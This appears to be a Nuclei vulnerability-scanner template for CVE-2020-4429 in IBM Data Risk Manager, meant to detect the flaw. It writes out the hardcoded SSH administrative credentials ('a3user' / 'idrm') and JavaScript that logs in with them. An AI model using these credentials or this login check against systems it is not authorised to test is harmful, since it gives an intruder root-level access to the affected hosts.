id: CVE-2020-4429 info: name: IBM Data Risk Manager - Hardcoded Credentials author: Kazgangap severity: critical description: | IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID- 180534. impact: | Remote attackers can gain root access and execute arbitrary code, potentially leading to complete system compromise. remediation: | Change default passwords and update to the latest version if available. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/180534 - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb - https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-4429 cwe-id: CWE-798 epss-score: 0.90704 epss-percentile: 0.99637 cpe: cpe:2.3:a:ibm:data_risk_manager:2.0.1:*:*:*:*:*:*:* metadata: verified: false max-request: 1 vendor: ibm product: data_risk_manager tags: js,cve,cve2020,ssh,ibm,default-login,vkev javascript: - pre-condition: | var m = require("nuclei/ssh"); var c = m.SSHClient(); var response = c.ConnectSSHInfoMode(Host, Port); response["UserAuth"].includes("password") code: | var m = require("nuclei/ssh"); var c = m.SSHClient(); c.Connect(Host,Port,Username,Password); args: Host: "{{Host}}" Port: "22" Username: "a3user" Password: "idrm" matchers: - type: dsl dsl: - "response == true" - "success == true" condition: and # digest: 4a0a00473045022100ba64cd50ea0195e33f908e8a000592014dba1f060f16b17ed993c65a6819c5b302204973dc1aa20f4f787d934dffd228abf5625d155a10fea510f905cc331929cffb:922c64590222798bb761d5b6d8e72950